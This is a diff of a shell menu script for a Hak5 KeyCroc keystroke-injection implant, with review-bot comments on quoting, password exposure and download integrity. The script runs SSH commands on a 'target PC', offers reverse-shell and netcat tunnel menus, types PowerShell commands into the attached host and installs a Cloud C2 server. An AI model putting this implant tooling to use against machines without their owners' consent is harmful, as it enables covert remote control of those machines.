sshpass -p $(target_pw) ssh -o "StrictHostKeyChecking no" $(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)@$(os_ip) ''${USER_COMMAND}'' sleep 5 else - ssh -o "StrictHostKeyChecking no" $(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)@$(os_ip) ${USER_COMMAND} + ssh -o "StrictHostKeyChecking no" $(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)@$(os_ip) ''${USER_COMMAND}'' sleep 5 fi } +## +#----SSH remote command Menu +## command_menu() { -MenuTitle REMOTE COMMAND MENU -MenuColor 1 COMMAND TO TARGET PC ; echo -ne " ${clear}\n" -MenuColor 2 USERNAME/IP AND COMMAND ; echo -ne " ${clear}\n" -MenuColor 3 COMMAND TO PINEAPPLE ; echo -ne " ${clear}\n" -MenuColor 4 COMMAND TO SQUIRREL ; echo -ne " ${clear}\n" -MenuColor 5 COMMAND TO TURTLE ; echo -ne " ${clear}\n" -MenuColor 6 COMMAND TO SHARK ; echo -ne " ${clear}\n" -MenuColor 7 COMMAND TO BUNNY ; echo -ne " ${clear}\n" -MenuColor 8 RETURN 
TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle REMOTE COMMAND MENU ; MenuColor 24 1 COMMAND TO TARGET PC ; MenuColor 24 2 USERNAME/IP AND COMMAND ; MenuColor 24 3 COMMAND TO SQUIRREL +MenuColor 24 4 COMMAND TO TURTLE ; MenuColor 24 5 COMMAND TO SHARK ; MenuColor 24 6 COMMAND TO BUNNY ; MenuColor 24 7 RETURN TO MAIN MENU ; MenuEnd 27 case $m_a in - 1) pc_target_command ; command_menu ;; - 2) input_command ; command_menu ;; - 3) target_command root 172.16.42.1 ; command_menu ;; - 4) target_command root 172.16.32.1 ; command_menu ;; - 5) target_command root 172.16.84.1 ; command_menu ;; - 6) target_command root ${IP_F} ; command_menu ;; - 7) target_command root localhost -p 7000 ; command_menu ;; - 8) main_menu ;; - 0) exit 0 ;; - [bB]) croc_reverse_shell ;; - *) invalid_entry ; remote_command ;; + 1) pc_target_command ; command_menu ;; 2) input_command ; command_menu ;; 3) target_command root 172.16.32.1 ; command_menu ;; 4) target_command root 172.16.84.1 ; command_menu ;; + 5) shark_check ; target_command root ${DEFAULT_IP} ; command_menu ;; 6) target_command root localhost -p 7000 ; command_menu ;; 7) main_menu ;; 0) exit 0 ;; [bB]) croc_reverse_shell ;; *) invalid_entry ; remote_command ;; esac } command_menu 
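Review bot: The new scp helpers splice prompt input unquoted into local arguments and into remote command strings (`'find /'${r_f}' -type f ...'`, `'test -e '${r_a}''`, `scp ... ${r_a} ...` in `keycroc_target`, `target_keycroc`, `user_file` and `remote_host`), so a path containing a space or a shell metacharacter is re-parsed by the local or remote shell instead of being treated as one file name. Quoting locally and escaping for the remote side fixes that, e.g. `ssh ... "test -e $(printf '%q' "${r_a}")"` (assuming a bash-compatible remote shell) and `scp -o "StrictHostKeyChecking no" "${c_f}" "${r_n}@${r_h}:~/"`. The `''${USER_COMMAND}''` form in `remote_command` has the same problem: the two `''` are empty strings and the expansion stays unquoted, so `"${USER_COMMAND}"` is probably what was intended. `sshpass -p $(target_pw)` also places the password on the command line where `ps` can show it; sshpass's `-e` (read from `SSHPASS`) or `-f` avoids that. Only the first ssh call in `target_keycroc` and `remote_host` carries the `StrictHostKeyChecking` option, so the later calls behave differently on an unknown host.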
@@ -4985,26 +7044,11 @@ command_menu ## #----SSH croc reverse shell Menu ## -MenuTitle REVERSE SSH TUNNEL MENU -MenuColor 1 REVERSE TUNNEL NETCAT ; echo -ne " ${clear}\n" -MenuColor 2 CROC LISTENING ; echo -ne " ${clear}\n" -MenuColor 3 REVERSE TUNNEL PAYLOAD ; echo -ne " ${clear}\n" -MenuColor 4 REVERSE TUNNEL TARGET PC ; echo -ne " ${clear}\n" -MenuColor 5 REVERSE TUNNEL VPS ; echo -ne " ${clear}\n" -MenuColor 6 REMOTE COMMANDS TARGETS ; echo -ne " ${clear}\n" -MenuColor 7 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle REVERSE SSH TUNNEL MENU ; MenuColor 24 1 REVERSE TUNNEL NETCAT ; MenuColor 24 2 CROC LISTENING ; MenuColor 24 3 REVERSE TUNNEL PAYLOAD ; MenuColor 24 4 REVERSE TUNNEL TARGET PC ; MenuColor 24 5 REVERSE TUNNEL VPS +MenuColor 24 6 REMOTE COMMANDS TARGETS ; MenuColor 24 7 SEND FILE WITH SCP ; MenuColor 24 8 RETURN TO MAIN MENU ; MenuEnd 27 case $m_a in - 1) remote_listener ; croc_reverse_shell ;; - 2) croc_listener ; croc_reverse_shell ;; - 3) reverse_payload ; croc_reverse_shell ;; - 4) shell_pc ; croc_reverse_shell ;; - 5) ssh_tunnel ; croc_reverse_shell ;; - 6) remote_command ;; - 7) main_menu ;; - 0) exit 0 ;; - [bB]) ssh_menu ;; - *) invalid_entry ; croc_reverse_shell ;; + 1) remote_listener ; croc_reverse_shell ;; 2) croc_listener ; croc_reverse_shell ;; 3) reverse_payload ; croc_reverse_shell ;; 4) shell_pc ; croc_reverse_shell ;; 5) ssh_tunnel ; croc_reverse_shell ;; + 6) remote_command ;; 7) remote_file ;; 8) main_menu ;; 0) exit 0 ;; [bB]) ssh_menu ;; *) invalid_entry ; croc_reverse_shell ;; esac } ## @@ -5012,7 +7056,8 @@ MenuEnd ## remove_sshkey() { clear - echo -ne "$(Info_Screen '-Add correct host key in /root/.ssh/known_hosts to get rid of this message + echo -ne "$(Info_Screen ' +-Add correct host key in /root/.ssh/known_hosts to get rid of this message -remove with: ssh-keygen -f "/root/.ssh/known_hosts" -R IP -Just add the IP to remove ssh-keygen')\n\n" read_all REMOVE SSH_KEYGEN FOR PACIFIC IP Y/N AND PRESS [ENTER] 
@@ -5030,33 +7075,18 @@ esac #----SSH Menu ## LED B -echo -ne "\n" ; MenuTitle CROC POT SSH MENU | tr '\n' '\t' ; echo -ne "\n" -echo -ne "\t\t" ; MenuColor 1 SSH TARGET PC | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 8 SIGNAL OWL | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 2 SSH USER INPUT | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 9 SHARK JACK | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 3 ENABLE_SSH | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 10 BASH BUNNY | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 4 DISABLE_SSH | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 11 REVERSE SHELL | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 5 WIFI PINEAPPLE | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 12 PUBLIC/PRIVATE KEY | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 6 PACKET SQUIRREL | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 13 REMOVE SSH_KEYGEN | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 7 LAN TURTLE | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 14 RETURN TO MAIN MENU | tr -d '\t' ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle CROC POT SSH MENU +echo -ne "\t\t" ; MenuColor 18 1 SSH TARGET PC | tr -d '\t\n' ; MenuColor 20 8 SIGNAL OWL | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 2 SSH USER INPUT | tr -d '\t\n' ; MenuColor 20 9 SHARK JACK | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 3 ENABLE_SSH | tr -d '\t\n' ; MenuColor 19 10 BASH BUNNY | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 4 DISABLE_SSH | tr -d '\t\n' ; MenuColor 19 11 REVERSE SHELL | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 5 WIFI PINEAPPLE MK7 | tr -d '\t\n' ; MenuColor 19 12 PUBLIC/PRIVATE KEY | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 6 PACKET SQUIRREL | tr -d '\t\n' ; MenuColor 19 13 REMOVE SSH_KEYGEN | tr -d '\t' +echo -ne "\t\t" ; MenuColor 18 7 LAN TURTLE | tr -d '\t\n' ; MenuColor 18 14 RETURN TO MAIN MENU | tr -d '\t' +MenuEnd 23 case $m_a in - 1) pc_ssh 
; ssh_menu ;; - 2) userinput_ssh ; ssh_menu ;; - 3) ENABLE_SSH ; ssh_menu ;; - 4) DISABLE_SSH ; ssh_menu ;; - 5) ssh_pineapple ; ssh_menu ;; - 6) ssh_squirrel ; ssh_menu ;; - 7) ssh_turtle ; ssh_menu ;; - 8) ssh_owl ; ssh_menu ;; - 9) ssh_shark ; ssh_menu ;; - 10) ssh_bunny ; ssh_menu ;; - 11) croc_reverse_shell ; ssh_menu ;; - 12) ssh_keygen ; ssh_menu ;; - 13) remove_sshkey ; ssh_menu ;; - 14) main_menu ;; - 0) exit 0 ;; - [bB]) main_menu ;; - *) invalid_entry ; ssh_menu ;; + 1) pc_ssh ; ssh_menu ;; 2) echo -ne "${yellow}Reachable target on local network:${clear}\n" ; reachable_target ; userinput_ssh ; ssh_menu ;; 3) ENABLE_SSH ; ssh_menu ;; 4) DISABLE_SSH ; ssh_menu ;; 5) ssh_pineapple ;; 6) ssh_squirrel ; ssh_menu ;; 7) ssh_turtle ; ssh_menu ;; + 8) ssh_owl ; ssh_menu ;; 9) ssh_shark ; ssh_menu ;; 10) ssh_bunny ; ssh_menu ;; 11) croc_reverse_shell ; ssh_menu ;; 12) ssh_keygen ; ssh_menu ;; 13) remove_sshkey ; ssh_menu ;; 14) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; ssh_menu ;; esac } ## @@ -5064,7 +7094,8 @@ MenuEnd ## function croc_recovery() { clear - echo -ne "$(Info_Screen '-Download The lastest firmware from Hak5 + echo -ne "$(Info_Screen ' +-Download The lastest firmware from Hak5 -This will save the Firmware to the keycroc tools folder -Restore the keycroc firmware with the lastest firmware -factory recovery will bring you to Hak5 factory recovery web page @@ -5074,7 +7105,8 @@ function croc_recovery() { ## croc_firmware() { clear - echo -ne "$(Info_Screen '-This will Download KeyCroc lastest firmware from Hak5 + echo -ne "$(Info_Screen ' +-This will Download KeyCroc lastest firmware from Hak5 -Download center and place it in the tools folder -for later recovery, Download may take some time')\n" if [ -e /root/udisk/tools/kc_fw_1.3_510.tar.gz ]; then 
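Review bot: Arm `5) ssh_pineapple ;;` no longer returns to `ssh_menu`, while every other device arm in this `case` still ends with `; ssh_menu ;;`, so when `ssh_pineapple` returns, the menu function simply ends. If `ssh_pineapple` now does its own navigation (its body is not in this hunk), a comment such as `# ssh_pineapple shows its own sub-menu and handles the return` would record that. Otherwise restore `5) ssh_pineapple ; ssh_menu ;;`. The enclosing function starts outside this hunk.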
@@ -5093,72 +7125,28 @@ esac fi } ## -#----hak5 factory recovery function -## -hak_factory() { - echo -ne "\n$(ColorYellow 'Open Hak5 factory recovery web page')\n" -if [ "$(OS_CHECK)" = WINDOWS ]; then - Q GUI d - Q GUI r - sleep 1 - Q STRING "powershell" - Q ENTER - sleep 2 - Q STRING "Start-Process https://docs.hak5.org/hc/en-us/articles/360048657394-Factory-Reset; exit" - Q ENTER -else - case $HOST_CHECK in -raspberrypi) - Q GUI d - sleep 1 - Q STRING "LXTerminal" - Q ENTER - Q ENTER - sleep 1 - Q STRING "gio open https://docs.hak5.org/hc/en-us/articles/360048657394-Factory-Reset; exit" - Q ENTER ;; -parrot) - Q ALT F2 - sleep 1 - Q STRING "mate-terminal" - Q ENTER - sleep 1 - Q STRING "gio open https://docs.hak5.org/hc/en-us/articles/360048657394-Factory-Reset; exit" - Q ENTER ;; -*) - Q ALT F2 - sleep 1 - Q STRING "xterm" - Q ENTER - sleep 1 - Q STRING "gio open https://docs.hak5.org/hc/en-us/articles/360048657394-Factory-Reset; exit" - Q ENTER ;; - esac -fi -} -## #----Restore lastest firmware function ## restore_firmware() { clear unset r_a echo -ne "\n$(ColorRed 'THIS WILL RESTORE THE KEYCROC TO THE LATEST FIRMWARE\n - ARE YOU SURE Y/N AND PRESS [ENTER]:')"; read r_a + ARE YOU SURE Y/N AND PRESS [ENTER]:')"; read -p $(echo -ne "\e[30;42m") r_a && echo -ne "${clear}" case $r_a in - [yY] | [yY][eE][sS]) +[yY] | [yY][eE][sS]) if [ -e /root/udisk/tools/kc_fw_1.3_510.tar.gz ]; then - echo -ne "$(ColorYellow 'Moving Firmware to KeyCroc udisk - This will take an couple of minutes')\n" - cp /root/udisk/tools/kc_fw_1.3_510.tar.gz /root/udisk - echo -ne "$(ColorGreen 'You can now unplug the KeyCroc and plug back in')\n" + echo -ne "$(ColorYellow 'Moving Firmware to KeyCroc udisk + This will take an couple of minutes')\n" + cp /root/udisk/tools/kc_fw_1.3_510.tar.gz /root/udisk + echo -ne "$(ColorGreen 'You can now unplug the KeyCroc and plug back in')\n" else echo -ne "$(ColorRed 'DID NOT FIND KEYCROC FIRMWARE FILE PLEASE DOWNLOAD')\n" fi ;; - [nN] | [nN][oO]) - echo 
-ne "\n$(ColorYellow 'Returning back to menu')\n" - croc_recovery ;; - *) - invalid_entry ; restore_firmware ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Returning back to menu')\n" + croc_recovery ;; +*) + invalid_entry ; restore_firmware ;; esac } ## @@ -5166,7 +7154,8 @@ esac ## locale_en_US() { clear - echo -ne "\n$(Info_Screen '--This will fix LC_ALL=en_US.UTF-8 if you get this error at ssh + echo -ne "\n$(Info_Screen ' +--This will fix LC_ALL=en_US.UTF-8 if you get this error at ssh --bash: warning: setlocale: LC_ALL: cannot change locale en_US.UTF-8 --This is for US language --Not sure if this will work on other language keyboards')\n\n" 
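Review bot: In `restore_firmware` the copy `cp /root/udisk/tools/kc_fw_1.3_510.tar.gz /root/udisk` is followed unconditionally by the "You can now unplug" message, so a failed or incomplete copy still tells the operator to power-cycle onto a bad firmware archive. Gate the message on the copy and flush it first, e.g. `cp /root/udisk/tools/kc_fw_1.3_510.tar.gz /root/udisk && sync && echo -ne "$(ColorGreen 'You can now unplug the KeyCroc and plug back in')\n"`, with an error message on the failure path. The new prompt `read -p $(echo -ne "\e[30;42m") r_a` also leaves the substitution unquoted and reads without `-r`; `read -r -p "$(echo -ne "\e[30;42m")" r_a` is the safer form. The same line is added in the remove_croc_pot hunk (-5191).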
@@ -5191,23 +7180,24 @@ esac ## remove_croc_pot() { clear - echo -ne "\n$(Info_Screen '-Completely remove Croc_Pot and all its contents from the KeyCroc')\n\n" - echo -ne "$(ColorRed 'ARE YOU SURE TO REMOVE CROC_POT TYPE YES OR NO AND PRESS [ENTER]:')"; read CROC_POT_REMOVE + echo -ne "\n$(Info_Screen ' +-Completely remove Croc_Pot and all its contents from the KeyCroc')\n\n" + echo -ne "$(ColorRed 'ARE YOU SURE TO REMOVE CROC_POT TYPE YES OR NO AND PRESS [ENTER]:')"; read -p $(echo -ne "\e[30;42m") CROC_POT_REMOVE && echo -ne "${clear}" case $CROC_POT_REMOVE in [yY] | [yY][eE][sS]) - apt -y remove unzip openvpn mc nmon sshpass screenfetch whois dnsutils sslscan + apt -y remove unzip openvpn mc nmon sshpass screenfetch whois dnsutils sslscan speedtest-cli host hping3 stunnel ike-scan rm -r /var/hak5c2 /root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot/Bunny_Payload_Shell /root/udisk/tools/Croc_Pot rm /usr/local/bin/c2-3.1.2_armv7_linux /etc/systemd/system/hak5.service /root/udisk/payloads/Getonline_Linux.txt - rm /root/udisk/tools/kc_fw_1.3_510.tar.gz /root/udisk/payloads/Croc_Pot_Payload.txt - rm /root/udisk/payloads/Croc_unlock_1.txt /root/udisk/payloads/Croc_unlock_2.txt - rm /root/udisk/payloads/Getonline_Raspberry.txt /root/udisk/payloads/Quick_Start_C2.txt + rm /root/udisk/tools/kc_fw_1.3_510.tar.gz /root/udisk/payloads/Croc_Pot_Payload.txt /root/udisk/payloads/Croc_Bite.txt.txt + rm /root/udisk/payloads/Croc_unlock_1.txt /root/udisk/payloads/Croc_unlock_2.txt /root/udisk/payloads/No_Sleeping.txt + rm /root/udisk/payloads/Getonline_Raspberry.txt /root/udisk/payloads/Quick_Start_C2.txt /root/udisk/payloads/Croc_replace.txt rm /root/udisk/payloads/Quick_start_Croc_Pot.txt /root/udisk/payloads/Getonline_Windows.txt rm /root/udisk/tools/Croc_Pot/Croc_OS.txt /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt rm /root/udisk/tools/Croc_Pot.sh /root/udisk/payloads/Croc_Shot.txt /root/udisk/payloads/Croc_Shell.txt apt-get autoremove exit 0 ;; [nN] | [nN][oO]) - echo -e 
"\n$(ColorYellow 'Return Back to main menu')" ;; + echo -e "\n$(ColorYellow 'Return Back to main menu')" ; main_menu ;; *) invalid_entry ; remove_croc_pot esac @@ -5217,7 +7207,8 @@ esac ## croc_update() { clear - echo -ne "$(Info_Screen '-Update/Upgrade your KeyCroc Packages + echo -ne "$(Info_Screen ' +-Update/Upgrade your KeyCroc Packages -NOTE: This could break important Packages the keycroc needs to work properly')\n\n" read_all UPDATE KEYCROC PACKAGES Y/N AND PRESS [ENTER] case $r_a in @@ -5235,7 +7226,8 @@ esac ## reboot_shutdown() { clear - echo -ne "$(Info_Screen '-Reboot or shutdown Target pc')\n\n" + echo -ne "$(Info_Screen ' +-Reboot or shutdown Target pc')\n\n" shutdown_pc() { if [ "$(OS_CHECK)" = WINDOWS ]; then Q GUI d 
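Review bot: The added path `/root/udisk/payloads/Croc_Bite.txt.txt` has a doubled extension, unlike every other payload in this list, so it looks like a typo that would leave that payload on the device after a removal described as complete. `Croc_Bite.txt` is probably what was meant; confirm against the code that installs it, which is not in this hunk. The longer `apt -y remove` list now names general-purpose packages such as `host` and `stunnel`, which may have been present before Croc_Pot was installed. Recording what the script itself installed and removing only that would avoid breaking other tooling on the device.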
@@ -5319,47 +7311,19 @@ fi ## #----Recovery Reboot/Shutdown menu ## -MenuTitle REBOOT/SHUTDOWN TARGET PC -MenuColor 1 SHUTDOWN TARGET PC ; echo -ne " ${clear}\n" -MenuColor 2 REBOOT TARGET PC ; echo -ne " ${clear}\n" -MenuColor 3 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle REBOOT/SHUTDOWN TARGET PC ; MenuColor 19 1 SHUTDOWN TARGET PC ; MenuColor 19 2 REBOOT TARGET PC ; MenuColor 19 3 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) shutdown_pc ;; - 2) reboot_pc ;; - 3) main_menu ;; - 0) exit 0 ;; - [bB]) croc_recovery ;; - *) invalid_entry ; reboot_shutdown ;; + 1) shutdown_pc ;; 2) reboot_pc ;; 3) main_menu ;; 0) exit 0 ;; [bB]) croc_recovery ;; *) invalid_entry ; reboot_shutdown ;; esac } ## #----Recovery menu ## -MenuTitle KEYCROC RECOVERY MENU -MenuColor 1 DOWNLOAD LATEST FIRMWARE ; echo -ne " ${clear}\n" -MenuColor 2 FACTORY RESET HOW TO ; echo -ne " ${clear}\n" -MenuColor 3 RESTORE LASTEST FIRMWARE ; echo -ne " ${clear}\n" -MenuColor 4 REMOVE LASTEST FIRMWARE ; echo -ne " ${clear}\n" -MenuColor 5 REPAIR en_US.UTF-8 ERROR ; echo -ne " ${clear}\n" -MenuColor 6 KEYCROC UPDATE PACKAGES ; echo -ne " ${clear}\n" -MenuColor 7 REMOVE CROC_POT AN CONTENTS ; echo -ne " ${clear}\n" -MenuColor 8 REBOOT/SHUTDOWN TARGET PC ; echo -ne " ${clear}\n" -MenuColor 9 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle KEYCROC RECOVERY MENU ; MenuColor 27 1 DOWNLOAD LATEST FIRMWARE ; MenuColor 27 2 FACTORY RESET HOW TO ; MenuColor 27 3 RESTORE LASTEST FIRMWARE ; MenuColor 27 4 REMOVE LASTEST FIRMWARE ; MenuColor 27 5 REPAIR en_US.UTF-8 ERROR +MenuColor 27 6 KEYCROC UPDATE PACKAGES ; MenuColor 27 7 REMOVE CROC_POT AN CONTENTS ; MenuColor 27 8 REBOOT/SHUTDOWN TARGET PC ; MenuColor 27 9 RETURN TO MAIN MENU ; MenuEnd 30 case $m_a in - 1) croc_firmware ; croc_recovery ;; - 2) hak_factory ; croc_recovery ;; - 3) restore_firmware ; croc_recovery ;; - 4) echo -ne "\n$(ColorYellow 'Removing lastest firmware file from tools folder')\n" ; rm 
/root/udisk/tools/kc_fw_1.3_510.tar.gz ; croc_recovery ;; - 5) locale_en_US ; croc_recovery ;; - 6) croc_update ; croc_recovery ;; - 7) remove_croc_pot ;; - 8) reboot_shutdown ; croc_recovery ;; - 9) main_menu ;; - 0) exit 0 ;; - [bB]) main_menu ;; - *) invalid_entry ; croc_recovery ;; + 1) croc_firmware ; croc_recovery ;; 2) start_web https://docs.hak5.org/hc/en-us/articles/360048657394-Factory-Reset ; croc_recovery ;; 3) restore_firmware ; croc_recovery ;; 4) echo -ne "\n$(ColorYellow 'Removing lastest firmware file from tools folder')\n" ; rm /root/udisk/tools/kc_fw_1.3_510.tar.gz ; croc_recovery ;; + 5) locale_en_US ; croc_recovery ;; 6) croc_update ; croc_recovery ;; 7) remove_croc_pot ;; 8) reboot_shutdown ; croc_recovery ;; 9) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; croc_recovery ;; esac } ## @@ -5367,7 +7331,8 @@ MenuEnd ## function hak_cloud() { clear - echo -ne "$(Info_Screen '-Run HAK5 Cloud C2 on the keycroc + echo -ne "$(Info_Screen ' +-Run HAK5 Cloud C2 on the keycroc -When running setup, maximize your screen to read Token keys properly -To get Token keys Run #3 RELOAD HAK5 C2 until the keys show up -May need to Unplug the keycroc plug back in and try again 
@@ -5382,18 +7347,15 @@ cloud_setup() { read_all DOWNLOAD AND INSTALL CLOUD C2 AND UNZIP Y/N AND PRESS [ENTER] case $r_a in [yY] | [yY][eE][sS]) - local status_zip="$(dpkg-query -W --showformat='${db:Status-Status}' "unzip" 2>&1)" -if [ ! $? = 0 ] || [ ! "$status_zip" = installed ]; then - apt -y install unzip -fi + install_package unzip UNZIP cloud_setup hak_cloud ## #----Hak5 Cloud_C2 download and install ## if [ -e /var/hak5c2 ]; then - echo -ne "\t\t${LINE_}$(ColorYellow 'HAK5 C2 is already installed on the keycroc')${LINE_}\n" + echo -ne "\t${LINE_}$(ColorYellow 'HAK5 C2 is already installed on the keycroc')${LINE_}\n" hak_cloud else - echo -ne "\n\t\t${LINE_}$(ColorGreen 'Installing HAK5 C2 on the keycroc')${LINE_}\n" + echo -ne "\n\t${LINE_}$(ColorGreen 'Installing HAK5 C2 on the keycroc')${LINE_}\n" sleep 3 wget https://c2.hak5.org/download/community -O /tmp/community && unzip /tmp/community -d /tmp sleep 5 @@ -5406,9 +7368,9 @@ ExecStart=/usr/local/bin/c2-3.1.2_armv7_linux -hostname $(ifconfig wlan0 | grep sleep 5 systemctl status hak5.service sleep 5 - echo -ne "\t\t${LINE_}$(ColorGreen 'HAK-5 Cloud C2 Installed, Starting C2 web UI')${LINE_}" + echo -ne "\t${LINE_}$(ColorGreen 'HAK-5 Cloud C2 Installed, Starting C2 web UI')${LINE_}" sleep 5 - start_web + cloud_web fi ;; [nN] | [nN][oO]) echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; 
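Review bot: The install path kept by this hunk still runs `wget https://c2.hak5.org/download/community -O /tmp/community && unzip /tmp/community -d /tmp` with fixed names in a shared temporary directory and no integrity check, and the extracted binary is what `hak5.service` later starts from `/usr/local/bin`. Downloading into a private directory and comparing the archive with a published checksum before installing would close that gap. For example, `tmpd=$(mktemp -d) && wget https://c2.hak5.org/download/community -O "$tmpd/community" && unzip "$tmpd/community" -d "$tmpd"`, with the later move adjusted to match (those lines are outside the hunk). `cloud_setup` starts and ends outside these hunks.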
@@ -5419,45 +7381,8 @@ esac ## #----Hak5 Cloud_C2 start web brower ## -start_web() { -if [ "$(OS_CHECK)" = WINDOWS ]; then - Q GUI d - Q GUI r - sleep 1 - Q STRING "powershell" - Q ENTER - sleep 2 - Q STRING "Start-Process http://$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-); exit" - Q ENTER -else - case $HOST_CHECK in -raspberrypi) - Q GUI d - sleep 1 - Q STRING "LXTerminal" - Q ENTER - Q ENTER - sleep 1 - Q STRING "gio open http://$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-); exit" - Q ENTER ;; -parrot) - Q ALT F2 - sleep 1 - Q STRING "mate-terminal" - Q ENTER - sleep 1 - Q STRING "gio open http://$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-); exit" - Q ENTER ;; -*) - Q ALT F2 - sleep 1 - Q STRING "xterm" - Q ENTER - sleep 1 - Q STRING "gio open http://$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-); exit" - Q ENTER ;; - esac -fi +cloud_web() { + start_web http://$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) } ## #----Hak5 Cloud_C2 reload @@ -5482,7 +7407,8 @@ remove_cloud() { quick_cloud() { local quickcloud=/root/udisk/payloads/Quick_Start_C2.txt clear - echo -ne "$(Info_Screen '-Will need to install Cloud C2 frist on the keycroc + echo -ne "$(Info_Screen ' +-Will need to install Cloud C2 frist on the keycroc -This will install Quick_Start_C2.txt in the payload folder -Use this to start C2 from a payload -Type in startc2 this will automatically start Hak5 cloud C2')\n" @@ -5514,7 +7440,8 @@ fi ## save_ip() { clear - echo -ne "$(Info_Screen '- #1 will save the IP,Netmask,Gateway that is setup with C2 + echo -ne "$(Info_Screen ' +- #1 will save the IP,Netmask,Gateway that is setup with C2 - #2 will restore the keycroc to saved IP,Netmask,Gateway - #3 Manually add IP,Netmask,Gateway')\n" save_setup() { 
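Review bot: The new `cloud_web` passes `http://$(ifconfig wlan0 | grep "inet addr" | ...)` to `start_web` unquoted and without checking that an address was found. When wlan0 is down or `ifconfig` prints the newer `inet` format without `addr`, `start_web` receives a bare `http://`, which, going by the removed implementation, is then typed into the attached host. Capturing the address in a local variable, testing that it is non-empty and quoting the argument avoids that. The error text in the sketch below is only a suggestion.

```shell
cloud_web() {
  local c2_ip
  c2_ip=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
  if [ -n "$c2_ip" ]; then
    start_web "http://${c2_ip}"
  else
    echo -ne "$(ColorRed 'NO IP ADDRESS FOUND ON wlan0')\n"
  fi
}
```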
@@ -5575,9 +7502,9 @@ edit_ip() { read_all CHANGE KEYCROC IP Y/N AND PRESS [ENTER] case $r_a in [yY] | [yY][eE][sS]) - echo -ne "$(ColorBlue 'ENTER IP TO BE USED AND PRESS [ENTER] ')"; read ip_e - echo -ne "$(ColorBlue 'ENTER NETMASK TO BE USED AND PRESS [ENTER] ')"; read mask_e - echo -ne "$(ColorBlue 'ENTER GATEWAY TO BE USED AND PRESS [ENTER] ')"; read gate_e + read_all ENTER IP TO BE USED AND PRESS [ENTER] ; ip_e=${r_a} + read_all ENTER NETMASK TO BE USED AND PRESS [ENTER] ; mask_e=${r_a} + read_all ENTER GATEWAY TO BE USED AND PRESS [ENTER] ; gate_e=${r_a} ifconfig wlan0 ${ip_e} netmask ${mask_e}; route add default gw ${gate_e} wlan0; ;; [nN] | [nN][oO]) echo -ne "\n$(ColorYellow 'KEEPING EXISTING SETUP')\n" ;; 
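Review bot: The three values read into `ip_e`, `mask_e` and `gate_e` go straight into `ifconfig wlan0 ${ip_e} netmask ${mask_e}; route add default gw ${gate_e} wlan0` unquoted and unvalidated, so a typo or stray space changes the arguments these commands receive and can leave the device unreachable. This commit adds a `validate_ip` pattern near the top of the file that looks intended for this. Check first with `[[ $ip_e =~ $validate_ip && $mask_e =~ $validate_ip && $gate_e =~ $validate_ip ]] || { invalid_entry ; return ; }`, then call `ifconfig wlan0 "${ip_e}" netmask "${mask_e}"; route add default gw "${gate_e}" wlan0`. The bare `[ENTER]` in the `read_all` arguments is also a glob pattern and would expand if a file named `E`, `N`, `T` or `R` exists in the working directory; quoting the prompt text avoids that. `edit_ip` starts and ends outside the hunk.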
@@ -5588,81 +7515,31 @@ esac ## #----Hak5 C2 ip restore Menu ## -MenuTitle SAVE C2 SETUP IP MENU -MenuColor 1 SAVE C2 SETUP IP ; echo -ne " ${clear}\n" -MenuColor 2 RESTORE C2 SETUP IP ; echo -ne " ${clear}\n" -MenuColor 3 EDIT CROC IP ; echo -ne " ${clear}\n" -MenuColor 4 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle SAVE C2 SETUP IP MENU ; MenuColor 19 1 SAVE C2 SETUP IP ; MenuColor 19 2 RESTORE C2 SETUP IP ; MenuColor 19 3 EDIT CROC IP ; MenuColor 19 4 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) save_setup ; save_ip ;; - 2) restore_ip ; save_ip ;; - 3) edit_ip ; save_ip ;; - 4) main_menu ;; - 0) exit 0 ;; - [bB]) hak_cloud ;; - *) invalid_entry ; save_ip ;; + 1) save_setup ; save_ip ;; 2) restore_ip ; save_ip ;; 3) edit_ip ; save_ip ;; 4) main_menu ;; 0) exit 0 ;; [bB]) hak_cloud ;; *) invalid_entry ; save_ip ;; esac } ## #----Hak5 Cloud_C2 menu ## -MenuTitle HAK5 CLOUD C2 MENU -MenuColor 